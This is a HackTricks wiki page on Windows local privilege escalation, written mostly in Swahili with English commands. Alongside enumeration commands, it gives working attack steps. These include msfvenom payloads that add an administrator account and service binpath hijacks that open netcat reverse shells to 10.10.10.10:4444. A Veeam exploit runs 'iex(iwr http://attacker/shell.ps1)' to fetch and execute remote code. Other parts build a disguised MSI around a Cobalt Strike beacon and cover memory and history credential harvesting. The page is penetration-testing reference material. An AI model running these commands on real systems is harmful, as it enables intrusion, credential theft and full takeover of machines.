Windows Local Privilege Escalation

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Vinjari katalogi kamili ya HackTricks Training kwa ajili ya njia za assessment (ARTA/GRTA/AzRTA) na Linux Hacking Expert (LHE).

Support HackTricks

• Angalia subscription plans!
• Jiunge na 💬 Discord group, telegram group, fuata @hacktricks_live kwenye X/Twitter, au angalia LinkedIn page na YouTube channel.
• Shiriki hacking tricks kwa kutuma PRs kwenye HackTricks na HackTricks Cloud github repos.

Chombo bora cha kutafuta Windows local privilege escalation vectors: WinPEAS

Initial Windows Theory

Access Tokens

Ikiwa hujui Access Tokens za Windows ni nini, soma ukurasa ufuatao kabla ya kuendelea:

Access Tokens

ACLs - DACLs/SACLs/ACEs

Angalia ukurasa ufuatao kwa maelezo zaidi kuhusu ACLs - DACLs/SACLs/ACEs:

ACLs - DACLs/SACLs/ACEs

Integrity Levels

Ikiwa hujui integrity levels katika Windows, unapaswa kusoma ukurasa ufuatao kabla ya kuendelea:

Integrity Levels

Windows Security Controls

Kuna vitu tofauti katika Windows ambavyo vinaweza kukuzuia kuorodhesha mfumo, kuendesha executables au hata kutambua shughuli zako. Unapaswa kusoma ukurasa ufuatao na kuorodhesha mekanizimu hizi zote za ulinzi kabla ya kuanza kuorodhesha privilege escalation:

Windows Security Controls

Admin Protection / UIAccess silent elevation

UIAccess processes zilizozinduliwa kupitia RAiLaunchAdminProcess zinaweza kutumiwa vibaya kufikia High IL bila prompts wakati AppInfo secure-path checks zimepita. Angalia workflow maalum ya UIAccess/Admin Protection bypass hapa:

Uiaccess Admin Protection Bypass

Secure Desktop accessibility registry propagation inaweza kutumiwa vibaya kwa arbitrary SYSTEM registry write (RegPwn):

Secure Desktop Accessibility Registry Propagation LPE (RegPwn)

System Info

Version info enumeration

Angalia kama Windows version ina vulnerability yoyote inayojulikana (angalia pia patches zilizotumika).

systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get system architecture

[System.Environment]::OSVersion.Version #Current OS version
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
Get-Hotfix -description "Security update" #List only "Security Update" patches

Version Exploits

This site ni muhimu kwa kutafuta taarifa za kina kuhusu udhaifu wa usalama wa Microsoft. Database hii ina zaidi ya 4,700 za vulnerabilities za usalama, ikionyesha attack surface kubwa sana ambayo mazingira ya Windows yanatoa.

On the system

• post/windows/gather/enum_patches
• post/multi/recon/local_exploit_suggester
• watson
• winpeas (Winpeas has watson embedded)

Locally with system information

• https://github.com/AonCyberLabs/Windows-Exploit-Suggester
• https://github.com/bitsadmin/wesng

Github repos of exploits:

• https://github.com/nomi-sec/PoC-in-GitHub
• https://github.com/abatchy17/WindowsExploits
• https://github.com/SecWiki/windows-kernel-exploits

Environment

Je, kuna credential yoyote/taarifa za Juicy zilizohifadhiwa kwenye env variables?

set
dir env:
Get-ChildItem Env: | ft Key,Value -AutoSize

Historia ya PowerShell

ConsoleHost_history #Find the PATH where is saved

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw

PowerShell Transcript files

Unaweza kujifunza jinsi ya kuiwasha katika https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/

#Check is enable in the registry
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
dir C:\Transcripts

#Start a Transcription session
Start-Transcript -Path "C:\transcripts\transcript0.txt" -NoClobber
Stop-Transcript

PowerShell Module Logging

Maelezo ya utekelezaji wa PowerShell pipeline yanarekodiwa, yakijumuisha amri zilizotekelezwa, invocations za amri, na sehemu za scripts. Hata hivyo, maelezo kamili ya utekelezaji na matokeo ya output huenda yasikamatwe.

Ili kuiwasha, fuata maelekezo katika sehemu ya “Transcript files” ya documentation, ukichagua “Module Logging” badala ya “Powershell Transcription”.

reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging

Ili kuona matukio 15 ya mwisho kutoka kwenye log za PowersShell unaweza kutekeleza:

Get-WinEvent -LogName "windows Powershell" | select -First 15 | Out-GridView

PowerShell Script Block Logging

Rekodi kamili ya shughuli na maudhui yote ya utekelezaji wa script hukamatwa, kuhakikisha kwamba kila block ya code inarekodiwa inavyotekelezwa. Mchakato huu huhifadhi audit trail ya kina ya kila shughuli, muhimu kwa forensics na kuchambua tabia mbaya. Kwa kuandika kila shughuli wakati wa utekelezaji, maarifa ya kina kuhusu mchakato hutolewa.

reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging

Matukio ya logging kwa Script Block yanaweza kupatikana ndani ya Windows Event Viewer kwenye njia: Application and Services Logs > Microsoft > Windows > PowerShell > Operational.
Ili kuona matukio 20 ya mwisho unaweza kutumia:

Get-WinEvent -LogName "Microsoft-Windows-Powershell/Operational" | select -first 20 | Out-Gridview

Mipangilio ya Internet

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings"

Hifadhi

wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root

WSUS

Unaweza kuidhibiti mfumo ikiwa masasisho hayaombwi kwa kutumia httpS bali http.

Unaanza kwa kuangalia kama mtandao unatumia sasisho la WSUS lisilo la SSL kwa kuendesha yafuatayo katika cmd:

reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer

Au kwa yafuatayo katika PowerShell:

Get-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate -Name "WUServer"

Ukipata jibu kama mojawapo ya hizi:

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
WUServer    REG_SZ    http://xxxx-updxx.corp.internal.com:8535

WUServer     : http://xxxx-updxx.corp.internal.com:8530
PSPath       : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows\windowsupdate
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows
PSChildName  : windowsupdate
PSDrive      : HKLM
PSProvider   : Microsoft.PowerShell.Core\Registry

Na kama HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer au Get-ItemProperty -Path hklm:\software\policies\microsoft\windows\windowsupdate\au -name "usewuserver" ni sawa na 1.

Kisha, inaweza kutumiwa vibaya. Ikiwa registry ya mwisho ni sawa na 0, basi ingizo la WSUS litapuuzwa.

Ili kutumia vibaya vulnerabilities hizi unaweza kutumia tools kama: Wsuxploit, pyWSUS - Hizi ni MiTM weaponized exploit scripts za kuingiza ‘fake’ updates kwenye non-SSL WSUS traffic.

Soma research hapa:

WSUS CVE-2020-1013

Soma report kamili hapa.
Kimsingi, huu ndio flaw ambayo bug hii hutumia:

Ikiwa tuna uwezo wa kurekebisha local user proxy yetu, na Windows Updates inatumia proxy iliyosanidiwa katika settings za Internet Explorer, basi tuna uwezo wa kuendesha PyWSUS locally ili ku-intercept traffic yetu wenyewe na kuendesha code kama elevated user kwenye asset yetu.

Zaidi ya hayo, kwa kuwa huduma ya WSUS inatumia settings za current user, pia itatumia certificate store yake. Tukizalisha self-signed certificate kwa WSUS hostname na kuongeza certificate hii ndani ya certificate store ya current user, tutaweza ku-intercept zote mbili HTTP na HTTPS WSUS traffic. WSUS haitumii mechanisms kama HSTS ili kutekeleza trust-on-first-use type validation kwenye certificate. Ikiwa certificate iliyowasilishwa inaaminika na user na ina hostname sahihi, itakubaliwa na service.

Unaweza kutumia vulnerability hii kwa kutumia tool WSUSpicious (mara itakapokuwa liberated).

Third-Party Auto-Updaters and Agent IPC (local privesc)

Wakala wengi wa enterprise hutoa localhost IPC surface na privileged update channel. Ikiwa enrollment inaweza kulazimishwa kwenda kwa attacker server na updater ikaamini rogue root CA au weak signer checks, local user anaweza kuwasilisha malicious MSI ambayo SYSTEM service husakinisha. Tazama technique ya jumla (kulingana na Netskope stAgentSvc chain – CVE-2025-0309) hapa:

Abusing Auto Updaters And Ipc

Veeam Backup & Replication CVE-2023-27532 (SYSTEM via TCP 9401)

Veeam B&R < 11.0.1.1261 inaonyesha localhost service kwenye TCP/9401 ambayo hushughulikia messages zinazoendeshwa na attacker, ikiruhusu arbitrary commands kama NT AUTHORITY\SYSTEM.

• Recon: thibitisha listener na version, kwa mfano, netstat -ano | findstr 9401 na (Get-Item "C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Shell.exe").VersionInfo.FileVersion.
• Exploit: weka PoC kama VeeamHax.exe pamoja na Veeam DLLs zinazohitajika kwenye directory ileile, kisha trigger SYSTEM payload kupitia local socket:

.\VeeamHax.exe --cmd "powershell -ep bypass -c \"iex(iwr http://attacker/shell.ps1 -usebasicparsing)\""

Huduma hii hutekeleza amri kama SYSTEM.

KrbRelayUp

Udhaifu wa local privilege escalation upo katika mazingira ya Windows domain chini ya masharti fulani. Masharti haya ni pamoja na mazingira ambapo LDAP signing is not enforced, watumiaji wana self-rights zinazoruhusu wao kusanidi Resource-Based Constrained Delegation (RBCD), na uwezo wa watumiaji kuunda computers ndani ya domain. Ni muhimu kutambua kwamba requirements hizi zinatimizwa kwa kutumia default settings.

Pata exploit in https://github.com/Dec0ne/KrbRelayUp

Kwa maelezo zaidi kuhusu mtiririko wa attack angalia https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/

AlwaysInstallElevated

If hizi registers 2 zimewezeshwa (thamani ni 0x1), basi users wenye privilege yoyote wanaweza install (execute) *.msi files kama NT AUTHORITY\SYSTEM.

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Mizigo ya Metasploit

msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi #No uac format
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi #Using the msiexec the uac wont be prompted

If you have a meterpreter session you can automate this technique using the module exploit/windows/local/always_install_elevated

PowerUP

Tumia amri ya Write-UserAddMSI kutoka power-up kuunda ndani ya saraka ya sasa faili ya Windows MSI ili kuongeza haki za mtumiaji. Script hii huandika MSI installer iliyokusanywa awali ambayo huonyesha ombi la kuongeza user/group (kwa hiyo utahitaji access ya GIU):

Write-UserAddMSI

Just execute the created binary to escalate privileges.

MSI Wrapper

Soma mafunzo haya ili ujifunze jinsi ya kuunda MSI wrapper kwa kutumia zana hizi. Kumbuka kwamba unaweza kufunga faili ya “.bat” ikiwa unataka tu kutekeleza mistari ya amri

MSI Wrapper

Create MSI with WIX

Create MSI with WIX

Create MSI with Visual Studio

• Generate kwa kutumia Cobalt Strike au Metasploit payload mpya ya Windows EXE TCP katika C:\privesc\beacon.exe
• Fungua Visual Studio, chagua Create a new project na andika “installer” kwenye kisanduku cha utafutaji. Chagua mradi wa Setup Wizard na bofya Next.
• Ipe mradi jina, kama AlwaysPrivesc, tumia C:\privesc kama eneo, chagua place solution and project in the same directory, na ubofye Create.
• Endelea kubofya Next hadi ufike hatua ya 3 kati ya 4 (choose files to include). Bofya Add na uchague Beacon payload uliyotengeneza hivi punde. Kisha bofya Finish.
• Angazia mradi wa AlwaysPrivesc katika Solution Explorer na kwenye Properties, badilisha TargetPlatform kutoka x86 kwenda x64.
• Kuna properties nyingine unazoweza kubadilisha, kama vile Author na Manufacturer ambazo zinaweza kufanya programu iliyosakinishwa ionekane halali zaidi.
• Bofya kulia mradi na uchague View > Custom Actions.
• Bofya kulia Install na uchague Add Custom Action.
• Bofya mara mbili Application Folder, chagua faili yako ya beacon.exe na ubofye OK. Hii itahakikisha kwamba beacon payload inatekelezwa mara tu kisakinishi kinapoendeshwa.
• Chini ya Custom Action Properties, badilisha Run64Bit kuwa True.
• Hatimaye, build it.
• Ikiwa onyo File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86' linaonyeshwa, hakikisha umeweka platform kuwa x64.

MSI Installation

Ili kutekeleza usakinishaji wa faili mbaya .msi kwa background:

msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\alwe.msi

Ili kutumia udhaifu huu unaweza kutumia: exploit/windows/local/always_install_elevated

Antivirus and Detectors

Audit Settings

Mipangilio hii huamua nini kinachokuwa kimeandikwa kwenye log, kwa hiyo unapaswa kuzingatia

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit

WEF

Windows Event Forwarding, ni muhimu kujua logs zinatumwa wapi

reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager

LAPS

LAPS imeundwa kwa ajili ya usimamizi wa nywila za local Administrator, ikihakikisha kwamba kila nenosiri ni la kipekee, la kubahatisha, na husasishwa mara kwa mara kwenye kompyuta zilizounganishwa na domain. Nywila hizi huhifadhiwa kwa usalama ndani ya Active Directory na zinaweza kufikiwa tu na watumiaji ambao wamepewa ruhusa za kutosha kupitia ACLs, zikioruhusu waone local admin passwords ikiwa wameidhinishwa.

LAPS

WDigest

Kama ikiwa active, plain-text passwords huhifadhiwa katika LSASS (Local Security Authority Subsystem Service).
Taarifa zaidi kuhusu WDigest katika ukurasa huu.

reg query 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' /v UseLogonCredential

Ulinzi wa LSA

Kuanzia Windows 8.1, Microsoft ilianzisha ulinzi ulioboreshwa kwa Local Security Authority (LSA) ili kuzuia majaribio ya michakato isiyoaminika ya kusoma kumbukumbu yake au kuingiza code, na hivyo kuimarisha zaidi mfumo.
Taarifa zaidi kuhusu Ulinzi wa LSA hapa.

reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA' /v RunAsPPL

Credentials Guard

Credential Guard ilianzishwa katika Windows 10. Lengo lake ni kulinda credentials zilizohifadhiwa kwenye device dhidi ya vitisho kama pass-the-hash attacks.| More info about Credentials Guard here.

reg query 'HKLM\System\CurrentControlSet\Control\LSA' /v LsaCfgFlags

Vitambulisho Vilivyohifadhiwa

Vitambulisho vya domain huthibitishwa na Local Security Authority (LSA) na hutumiwa na vipengele vya mfumo wa uendeshaji. Wakati data ya kuingia ya mtumiaji inathibitishwa na kifurushi cha usalama kilichosajiliwa, vitambulisho vya domain kwa mtumiaji kwa kawaida huanzishwa.
More info about Cached Credentials here.

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT

Watumiaji & Vikundi

Orodhesha Watumiaji & Vikundi

Unapaswa kuangalia ikiwa vikundi vyovyote ambavyo unahusika navyo vina ruhusa za kuvutia

# CMD
net users %username% #Me
net users #All local users
net localgroup #Groups
net localgroup Administrators #Who is inside Administrators group
whoami /all #Check the privileges

# PS
Get-WmiObject -Class Win32_UserAccount
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
Get-LocalGroupMember Administrators | ft Name, PrincipalSource

Vikundi vilivyo na haki maalum

Ikiwa unachukua uanachama katika kundi fulani lenye haki maalum unaweza kuweza kupandisha haki zako. Jifunze kuhusu vikundi vyenye haki maalum na jinsi ya kuvitumia vibaya ili kupandisha haki hapa:

Privileged Groups

Udhibiti wa tokeni

Jifunze zaidi kuhusu tokeni ni nini katika ukurasa huu: Windows Tokens.
Angalia ukurasa ufuatao ili kujifunza kuhusu tokeni zenye kuvutia na jinsi ya kuzitumia vibaya:

Abusing Tokens

Watumiaji walioingia / Vipindi

qwinsta
klist sessions

Folda za nyumbani

dir C:\Users
Get-ChildItem C:\Users

Sera ya Nenosiri

net accounts

Pata yaliyomo ya clipboard

powershell -command "Get-Clipboard"

Michakato Inayoendesha

Ruhusa za Faili na Folda

Kwanza kabisa, wakati wa kuorodhesha michakato angalia kama kuna nenosiri ndani ya command line ya mchakato.
Angalia ikiwa unaweza kuandika juu ya binary fulani inayooendesha au ikiwa una ruhusa za kuandika kwenye folda ya binary ili kutumia uwezekano wa mashambulizi ya DLL Hijacking attacks:

Tasklist /SVC #List processes running and services
tasklist /v /fi "username eq system" #Filter "system" processes

#With allowed Usernames
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize

#Without usernames
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id

Daima angalia kama kuna electron/cef/chromium debuggers zinazoendeshwa, unaweza kuitumia vibaya ili kuongeza ruhusa zako.

Kuangalia ruhusa za binaries za processes

for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (
for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do (
icacls "%%z"
2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo.
)
)

Kuangalia ruhusa za folda za binaries za process (DLL Hijacking)

for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v
"system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('echo %%x') do (
icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users
todos %username%" && echo.
)

Uchimbaji wa Password kutoka kwenye Memory

Unaweza kuunda memory dump ya mchakato unaoendeshwa kwa kutumia procdump kutoka sysinternals. Huduma kama FTP zina credentials kwa maandishi wazi kwenye memory, jaribu kudump memory na kusoma credentials.

procdump.exe -accepteula -ma <proc_name_tasklist>

Programu za GUI zisizo salama

Applications zinazoendeshwa kama SYSTEM zinaweza kumruhusu user kufungua CMD, au kuvinjari directories.

Mfano: “Windows Help and Support” (Windows + F1), tafuta “command prompt”, bofya kwenye “Click to open Command Prompt”

Services

Service Triggers huruhusu Windows kuanzisha service wakati hali fulani zinapotokea (shughuli za named pipe/RPC endpoint, ETW events, upatikanaji wa IP, kuwasili kwa device, GPO refresh, n.k.). Hata bila haki za SERVICE_START unaweza mara nyingi kuanzisha privileged services kwa kuchochea triggers zake. Angalia mbinu za enumeration na activation hapa:

Service Triggers

Pata orodha ya services:

net start
wmic service list brief
sc query
Get-Service

Ruhusa

Unaweza kutumia sc kupata taarifa za huduma

sc qc <service_name>

Inapendekezwa kuwa na binary accesschk kutoka Sysinternals ili kuangalia kiwango cha ruhusa kinachohitajika kwa kila service.

accesschk.exe -ucqv <Service_Name> #Check rights for different groups

Inapendekezwa kuangalia kama “Authenticated Users” wanaweza kurekebisha huduma yoyote:

accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv %USERNAME% * /accepteula
accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul
accesschk.exe -uwcqv "Todos" * /accepteula ::Spanish version

You can download accesschk.exe for XP for here

Enable service

Ikiwa unapata kosa hili (kwa mfano na SSDPSRV):

System error 1058 has occurred.
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

Unaweza kuiwasha kwa kutumia

sc config SSDPSRV start= demand
sc config SSDPSRV obj= ".\LocalSystem" password= ""

Kumbuka kwamba huduma upnphost inategemea SSDPSRV ili ifanye kazi (kwa XP SP1)

Njia nyingine ya kukabiliana na tatizo hili ni kuendesha:

sc.exe config usosvc start= auto

Rekebisha njia ya binary ya service

Katika hali ambapo kundi la “Authenticated users” lina SERVICE_ALL_ACCESS kwenye service, inawezekana kurekebisha executable binary ya service. Ili kurekebisha na kuendesha sc:

sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config <Service_Name> binpath= "net localgroup administrators username /add"
sc config <Service_Name> binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"

sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe"

Anzisha upya service

wmic service NAMEOFSERVICE call startservice
net stop [service name] && net start [service name]

Haki za utawala wa juu zinaweza kuongezwa kupitia ruhusa mbalimbali:

• SERVICE_CHANGE_CONFIG: Huaruhusu kupanga upya binary ya service.
• WRITE_DAC: Huwezesha kupanga upya permissions, na hivyo kuleta uwezo wa kubadilisha service configurations.
• WRITE_OWNER: Huruhusu kupata ownership na kupanga upya permissions.
• GENERIC_WRITE: Huirithi uwezo wa kubadilisha service configurations.
• GENERIC_ALL: Pia huirithi uwezo wa kubadilisha service configurations.

Kwa detection na exploitation ya vulnerability hii, exploit/windows/local/service_permissions inaweza kutumika.

Services binaries weak permissions

Angalia kama unaweza kubadilisha binary inayotekelezwa na service au kama una write permissions kwenye folder ambamo binary hiyo ipo (DLL Hijacking).
Unaweza kupata kila binary inayotekelezwa na service kwa kutumia wmic (si katika system32) na kuangalia permissions zako kwa kutumia icacls:

for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt

for /f eol^=^"^ delims^=^" %a in (%temp%\perm.txt) do cmd.exe /c icacls "%a" 2>nul | findstr "(M) (F) :\"

Unaweza pia kutumia sc na icacls:

sc query state= all | findstr "SERVICE_NAME:" >> C:\Temp\Servicenames.txt
FOR /F "tokens=2 delims= " %i in (C:\Temp\Servicenames.txt) DO @echo %i >> C:\Temp\services.txt
FOR /F %i in (C:\Temp\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> C:\Temp\path.txt

Ruhusa za kurekebisha registry ya services

Unapaswa kuangalia kama unaweza kurekebisha service registry yoyote.
Unaweza kuangalia ruhusa zako juu ya service registry kwa kufanya:

reg query hklm\System\CurrentControlSet\Services /s /v imagepath #Get the binary paths of the services

#Try to write every service with its current content (to check if you have write permissions)
for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv 2>nul & reg save %a %temp%\reg.hiv 2>nul && reg restore %a %temp%\reg.hiv 2>nul && echo You can modify %a

get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "<Username> Users Path Everyone"

Inapaswa kuangaliwa kama Authenticated Users au NT AUTHORITY\INTERACTIVE wanamiliki ruhusa za FullControl. Ikiwa ndivyo, binary inayotekelezwa na service inaweza kubadilishwa.

Ili kubadilisha Path ya binary inayotekelezwa:

reg add HKLM\SYSTEM\CurrentControlSet\services\<service_name> /v ImagePath /t REG_EXPAND_SZ /d C:\path\new\binary /f

Registry symlink race to arbitrary HKLM value write (ATConfig)

Beberapa vipengele vya Windows Accessibility huunda funguo za ATConfig za kila mtumiaji ambazo baadaye hunakiliwa na mchakato wa SYSTEM kwenda kwenye funguo ya kikao ya HKLM. Registry symbolic link race inaweza kuelekeza uandishi huo wenye ruhusa kwenda kwenye njia yoyote ya HKLM, na kukupa primitive ya arbitrary HKLM value write.

Maeneo muhimu (mfano: On-Screen Keyboard osk):

• HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs huorodhesha vipengele vya accessibility vilivyosakinishwa.
• HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATConfig\<feature> huhifadhi configuration inayodhibitiwa na mtumiaji.
• HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\Session<session id>\ATConfig\<feature> huundwa wakati wa logon/secure-desktop transitions na inaweza kuandikwa na mtumiaji.

Abuse flow (CVE-2026-24291 / ATConfig):

1. Jaza thamani ya HKCU ATConfig unayotaka iandikwe na SYSTEM.
2. Anzisha secure-desktop copy (kwa mfano, LockWorkstation), ambayo huanzisha AT broker flow.
3. Shinda race kwa kuweka oplock kwenye C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskmenu.xml; wakati oplock inapoanza, badilisha funguo ya HKLM Session ATConfig na registry link kuelekea protected HKLM target.
4. SYSTEM huandika thamani iliyochaguliwa na mshambulizi kwenye njia ya HKLM iliyoelekezwa upya.

Ukishapata arbitrary HKLM value write, hamia LPE kwa ku-overwrite service configuration values:

• HKLM\SYSTEM\CurrentControlSet\Services\<svc>\ImagePath (EXE/command line)
• HKLM\SYSTEM\CurrentControlSet\Services\<svc>\Parameters\ServiceDll (DLL)

Chagua service ambayo mtumiaji wa kawaida anaweza kuianzisha (kwa mfano, msiserver) na ui-trigger baada ya uandishi. Note: utekelezaji wa public exploit hu-lock workstation kama sehemu ya race.

Example tooling (RegPwn BOF / standalone):

beacon> regpwn C:\payload.exe SYSTEM\CurrentControlSet\Services\msiserver ImagePath
beacon> regpwn C:\evil.dll SYSTEM\CurrentControlSet\Services\SomeService\Parameters ServiceDll
net start msiserver

Services registry AppendData/AddSubdirectory permissions

Ikiwa una ruhusa hii juu ya registry, hii inamaanisha unaweza kuunda sub registries kutoka hapa. Katika hali ya Windows services, hii inatosha kutekeleza code yoyote:

AppendData/AddSubdirectory permission over service registry

Unquoted Service Paths

Ikiwa path ya executable haiko ndani ya quotes, Windows itajaribu kutekeleza kila mwisho kabla ya nafasi.

Kwa mfano, kwa path C:\Program Files\Some Folder\Service.exe Windows itajaribu kutekeleza:

C:\Program.exe
C:\Program Files\Some.exe
C:\Program Files\Some Folder\Service.exe

Orodhesha njia zote za huduma zisizo na quotes, ukiondoa zile zinazomilikiwa na huduma zilizojengwa ndani za Windows:

wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows" | findstr /i /v '\"'
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\Windows\system32" | findstr /i /v '\"'  # Not only auto services

# Using PowerUp.ps1
Get-ServiceUnquoted -Verbose

for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:"\""') do (
echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo.
)
)

gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name

Unaweza kugundua na kutumia udhaifu huu kwa metasploit: exploit/windows/local/trusted\_service\_path Unaweza kuunda kwa mikono binary ya service kwa kutumia metasploit:

msfvenom -p windows/exec CMD="net localgroup administrators username /add" -f exe-service -o service.exe

Vitendo vya Urejeshaji

Windows huruhusu watumiaji kubainisha vitendo vya kufanywa ikiwa huduma itashindwa. Kipengele hiki kinaweza kusanidiwa kuelekeza kwenye binary. Ikiwa binary hii inaweza kubadilishwa, huenda kuwe na uwezekano wa kuongezeka kwa ruhusa. Maelezo zaidi yanaweza kupatikana katika official documentation.

Programu

Programu Zilizowekwa

Angalia ruhusa za binaries (labda unaweza kuandika juu ya moja na kuongeza ruhusa) na za folda (DLL Hijacking).

dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE

Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name

Ruhusa za Kuandika

Angalia kama unaweza kurekebisha baadhi ya faili ya config ili kusoma faili maalum au kama unaweza kurekebisha baadhi ya binary ambayo itatekelezwa na akaunti ya Administrator (schedtasks).

Njia ya kupata ruhusa dhaifu za folder/faili kwenye system ni kufanya:

accesschk.exe /accepteula
# Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
accesschk.exe -uwdqs "Everyone" c:\
# Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
accesschk.exe -uwdqs "Everyone" c:\*.*

icacls "C:\Program Files\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
icacls ":\Program Files (x86)\*" 2>nul | findstr "(F) (M) C:\" | findstr ":\ everyone authenticated users todos %username%"

